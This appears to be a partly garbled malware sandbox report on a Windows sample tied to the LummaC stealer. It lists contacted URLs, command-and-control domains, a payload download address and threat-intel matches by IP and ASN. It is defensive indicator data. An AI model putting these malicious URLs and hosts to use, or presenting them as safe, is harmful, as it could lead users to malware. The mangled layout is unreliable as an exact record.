https://steam.tv/ | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://post-to-me.com/track_prt.php?sub=&cc=DE | hpEAJnNwCB.exe, 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://post-to-me.com/track_prt.php?sub=0&cc=DE~ | hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp; hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB | 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp; 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/privacy_agreement/ | 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp; 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/points/shop/ | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://sketchfab.com | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lv.queniujq.cn | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com/ | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com:443/profiles/76561199724331900ffuculttan.xyz | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/privacy_agreement/ | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://post-to-me.com/track_prt.php?sub= | hpEAJnNwCB.exe | false | | high
http://176.113.115.19/ScreenUpdateSync.exey0 | hpEAJnNwCB.exe, 00000000.00000002.3745877120.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp; hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp; hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/h. | 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/recaptcha/ | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://checkout.steampowered.com/ | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://post-to-me.com/ | hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp; hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://176.113.115.19/$0 | hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/; | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://176.113.115.19/ScreenUpdateSync.exeWX | hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/about/ | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/my/wishlist/ | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe& | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://post-to-me.com/track_prt.php?sub=0&cc=DE6 | hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp; hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://help.steampowered.com/en/ | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/market/ | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/news/ | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://recaptcha.net/recaptcha/;91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://176.113.115.19/ScreenUpdateSync.exel0hpEAJnNwCB.exe, 00000000.00000002.3745877120.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://steamcommunity.com/discussions/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://store.steampowered.com/stats/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://effecterectz.x91B1.tmp.exe, 00000003.00000003.1471571879.0000000000953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://medal.tv91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://broadcast.st.dl.eccdnx.com91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://store.steampowered.com/steam_refunds/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119972433190091B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=96201691B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://steamcommunity.com/workshop/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://login.steampowered.com/91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://store.steampowered.com/legal/91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://recaptcha.net91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://upx.sf.netAmcache.hve.7.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://effecterectz.xyz/91B1.tmp.exe, 00000003.00000003.1471571879.0000000000949000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://effecterectz.xyz/P91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://store.steampowered.com/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://steamcommunity.com91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://127.0.0.1:2706091B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://effecterectz.xyz/api91B1.tmp.exe, 00000003.00000003.1471879039.000000000096A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
45.77.249.79 | immureprech.biz | United States | 20473 | AS-CHOOPAUS | false
104.21.56.70 | post-to-me.com | United States | 13335 | CLOUDFLARENETUS | false
104.131.68.180 | deafeninggeh.biz | United States | 14061 | DIGITALOCEAN-ASNUS | false
176.113.115.19 | unknown | Russian Federation | 49505 | SELECTELRU | false
104.121.10.34 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1576575
Start date and time:2024-12-17 09:41:44 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 8m 29s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:hpEAJnNwCB.exe
renamed because original name is a hash value
Original Sample Name:07a0b87962fbee50d2adc913f06a3e3b.exe
Detection:MAL
Classification:mal100.troj.evad.winEXE@4/7@13/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 42
• Number of non-executed functions: 336
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.89.179.12, 13.107.246.63, 172.202.163.200, 40.126.53.14
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:42:41 | API Interceptor | 8929906x Sleep call for process: hpEAJnNwCB.exe modified
03:42:47 | API Interceptor | 5x Sleep call for process: 91B1.tmp.exe modified
03:43:23 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
45.77.249.79 | UoktqWamLR.exe | malicious | AZORult | ehzwq.shop/erd/mac/index.php
45.77.249.79 | RgZaLjgCto.exe | malicious | Tinba | uyhgqunqkxnx.pw/EiDQjNbWEQ/
45.77.249.79 | java.exe | malicious | Tinba | uyhgqunqkxnx.pw/EiDQjNbWEQ/
104.21.56.70 | DG55Gu1yGM.exe | malicious | LummaC |
104.21.56.70 | he55PbvM2G.exe | malicious | LummaC |
104.21.56.70 | AZCFTWko2q.exe | malicious | LummaC |
104.21.56.70 | rHrG691f7q.exe | malicious | LummaC |
104.21.56.70 | XIaCqh1vRm.exe | malicious | LummaC |
104.21.56.70 | QQx0tdFC0b.exe | malicious | LummaC |
104.21.56.70 | LXS5itpTK7.exe | malicious | Stealc |
104.21.56.70 | ief722WreR.exe | malicious | Stealc |
104.21.56.70 | 7gxaFDUSOD.exe | malicious | Stealc |
104.21.56.70 | YQ3PhY2Aeq.exe | malicious | Stealc, Vidar |
104.131.68.180 | java.exe | malicious | Tinba | uyhgqunqkxnx.pw/EiDQjNbWEQ/
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
deafeninggeh.biz | DG55Gu1yGM.exe | malicious | LummaC | 45.77.249.79
deafeninggeh.biz | he55PbvM2G.exe | malicious | LummaC | 104.131.68.180
deafeninggeh.biz | SkaKk8Z1J0.exe | malicious | LummaC | 104.131.68.180
deafeninggeh.biz | N1sb7Ii2YD.exe | malicious | LummaC | 178.62.201.34
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 104.131.68.180
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | 178.62.201.34
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | 104.131.68.180
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 45.77.249.79
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 45.77.249.79
deafeninggeh.biz | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.16.1
immureprech.biz | DG55Gu1yGM.exe | malicious | LummaC | 104.131.68.180
immureprech.biz | he55PbvM2G.exe | malicious | LummaC | 178.62.201.34
immureprech.biz | SkaKk8Z1J0.exe | malicious | LummaC | 45.77.249.79
immureprech.biz | N1sb7Ii2YD.exe | malicious | LummaC | 178.62.201.34
immureprech.biz | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 178.62.201.34
immureprech.biz | file.exe | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | 104.131.68.180
immureprech.biz | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | 104.131.68.180
immureprech.biz | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 45.77.249.79
immureprech.biz | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 104.131.68.180
immureprech.biz | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.207.38
steamcommunity.com | DG55Gu1yGM.exe | malicious | LummaC | 104.121.10.34
steamcommunity.com | he55PbvM2G.exe | malicious | LummaC | 104.121.10.34
steamcommunity.com | SkaKk8Z1J0.exe | malicious | LummaC | 104.121.10.34
steamcommunity.com | N1sb7Ii2YD.exe | malicious | LummaC | 104.121.10.34
steamcommunity.com | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 104.121.10.34
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | 104.121.10.34
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 23.37.186.133
steamcommunity.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 104.121.10.34
steamcommunity.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | 104.121.10.34
post-to-me.com | DG55Gu1yGM.exe | malicious | LummaC | 104.21.56.70
post-to-me.com | he55PbvM2G.exe | malicious | LummaC | 104.21.56.70
post-to-me.com | wN8pQhRNnu.exe | malicious | LummaC | 172.67.179.207
post-to-me.com | AZCFTWko2q.exe | malicious | LummaC | 104.21.56.70
post-to-me.com | rHrG691f7q.exe | malicious | LummaC | 104.21.56.70
post-to-me.com | TN78WX7nJU.exe | malicious | LummaC | 172.67.179.207
post-to-me.com | XIaCqh1vRm.exe | malicious | LummaC | 104.21.56.70
post-to-me.com | QQx0tdFC0b.exe | malicious | LummaC | 104.21.56.70
post-to-me.com | LXS5itpTK7.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | SEejSLAS9f.exe | malicious | Stealc | 172.67.179.207
Match / Associated Sample Name / URL | Detection | Threat Name | Context

Match: AS-CHOOPAUS
  DG55Gu1yGM.exe | malicious | LummaC | 45.77.249.79
  SkaKk8Z1J0.exe | malicious | LummaC | 45.77.249.79
  file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 45.77.249.79
  Setup.exe (1).zip | malicious | Unknown | 209.222.21.115
  file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 45.77.249.79
  mips.elf | malicious | Unknown | 149.248.45.75
  bot.spc.elf | malicious | Mirai | 45.32.181.8
  rebirth.mpsl.elf | malicious | Mirai, Okiru | 108.61.131.209
  Setup.msi | malicious | Unknown | 45.77.249.79
  http://home45insurance.blogspot.com | malicious | Unknown | 45.63.66.114

Match: DIGITALOCEAN-ASNUS
  payload_1.hta | malicious | RedLine | 174.138.125.138
  1.elf | malicious | Unknown | 157.245.2.219
  DG55Gu1yGM.exe | malicious | LummaC | 104.131.68.180
  he55PbvM2G.exe | malicious | LummaC | 178.62.201.34
  fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT | 174.138.125.138
  SkaKk8Z1J0.exe | malicious | LummaC | 104.131.68.180
  N1sb7Ii2YD.exe | malicious | LummaC | 178.62.201.34
  file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 178.62.201.34
  Client-built.exe | malicious | Quasar | 138.68.79.95
  file.exe | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | 178.62.201.34

Match: CLOUDFLARENETUS
  Ls4O6Pmixd.exe | malicious | Phemedrone Stealer | 104.26.0.100
  X2hna87N3Y.exe | malicious | LummaC | 104.21.50.161
  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
  https://forms.gle/WXkgv9t1iFkxFXZb7 | malicious | HTMLPhisher | 104.17.25.14
  RkB7FehGh6.exe | malicious | LummaC | 104.21.2.110
  MV GOLDEN SCHULTE DETAILS.exe | malicious | Snake Keylogger | 172.67.177.134
  https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1 | malicious | Unknown | 172.67.181.93
  c5bnEkMx.ps1 | malicious | LummaC | 104.21.64.1
  Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | malicious | Unknown | 104.21.83.229
  sEOELQpFOB.lnk | malicious | RedLine | 188.114.97.6

Match: SELECTELRU
  DG55Gu1yGM.exe | malicious | LummaC | 176.113.115.19
  he55PbvM2G.exe | malicious | LummaC | 176.113.115.19
  wN8pQhRNnu.exe | malicious | LummaC | 176.113.115.19
  AZCFTWko2q.exe | malicious | LummaC | 176.113.115.19
  file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 176.113.115.178
  rHrG691f7q.exe | malicious | LummaC | 176.113.115.19
  TN78WX7nJU.exe | malicious | LummaC | 176.113.115.19
  XIaCqh1vRm.exe | malicious | LummaC | 176.113.115.19
  QQx0tdFC0b.exe | malicious | LummaC | 176.113.115.19
  LXS5itpTK7.exe | malicious | Stealc | 176.113.115.19
Match / Associated Sample Name / URL | Detection | Threat Name | Context

Match: a0e9f5d64349fb13191bc781f81f42e1
  X2hna87N3Y.exe | malicious | LummaC | 104.131.68.180, 104.121.10.34, 45.77.249.79
  RkB7FehGh6.exe | malicious | LummaC | 104.131.68.180, 104.121.10.34, 45.77.249.79
  c5bnEkMx.ps1 | malicious | LummaC | 104.131.68.180, 104.121.10.34, 45.77.249.79
  DG55Gu1yGM.exe | malicious | LummaC | 104.131.68.180, 104.121.10.34, 45.77.249.79
  he55PbvM2G.exe | malicious | LummaC | 104.131.68.180, 104.121.10.34, 45.77.249.79
  SkaKk8Z1J0.exe | malicious | LummaC | 104.131.68.180, 104.121.10.34, 45.77.249.79
  N1sb7Ii2YD.exe | malicious | LummaC | 104.131.68.180, 104.121.10.34, 45.77.249.79
  file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | 104.131.68.180, 104.121.10.34, 45.77.249.79
  file.exe | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | 104.131.68.180, 104.121.10.34, 45.77.249.79
  file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | 104.131.68.180, 104.121.10.34, 45.77.249.79

Match: 37f463bf4616ecd445d4a1937da06e19
  Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | malicious | Unknown
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          • 104.21.56.70
                                                                                                                                                                                                                                          No context
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.957081685306807
Encrypted:false
SSDEEP:96:WZi1vUpEJsZh4Bb74sfNUQXIDcQUGc6UgscEMcw3B+HbHg/8BRTf3Oy1E45WAU69:fUpEJzOWb0DGGyju3RzuiF4Z24IO8c
MD5:48DB73B459F846EDCF960DB7596420EF
SHA1:F6DDD2BD9EF74459EC516650116F3D7B18DD7A9E
SHA-256:2624451391F13D38502E4ED9F30457AB70F970BA75755AA04A9E909FE96BAA04
SHA-512:CFC676120C42920F06A460ECB214C6EB9FCBE21746CBD170947EDC6ABADA141D99AE41A4F8BD1B90D18B79839AC1E4229A1E5FBB63C5869C00F6036A4A829625
Malicious:true
Reputation:low
Preview (UTF-16LE decoded):
Version=1
EventType=APPCRASH
EventTime=133788985793629873
ReportType=2
Consent=1
UploadTime=133788985798161041
ReportStatus=655456
ReportIdentifier=983e4d82-f09f-4ef8-a85f-abf4b4cadb06
IntegratorReportIdentifier=bbe111e4-8a7b-4242-a8cc-f6257806e279
Wow64Host=34404
Wow64Guest=332
NsAppName=91B1.tmp.exe
AppSessionGuid=00001f20-0001-0013-01b4-44a45f50db01
TargetAppId=W:00068da079f83ceccffaea924b233bb95afa0000ffff!00005e146c18717f7aa8cbd226ec750bce41bd8aa4b3!91B1.tmp.exe
TargetAppVer=
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Tue Dec 17 08:42:59 2024, 0x1205a4 type
Category:dropped
Size (bytes):45990
Entropy (8bit):2.5480841669698266
Encrypted:false
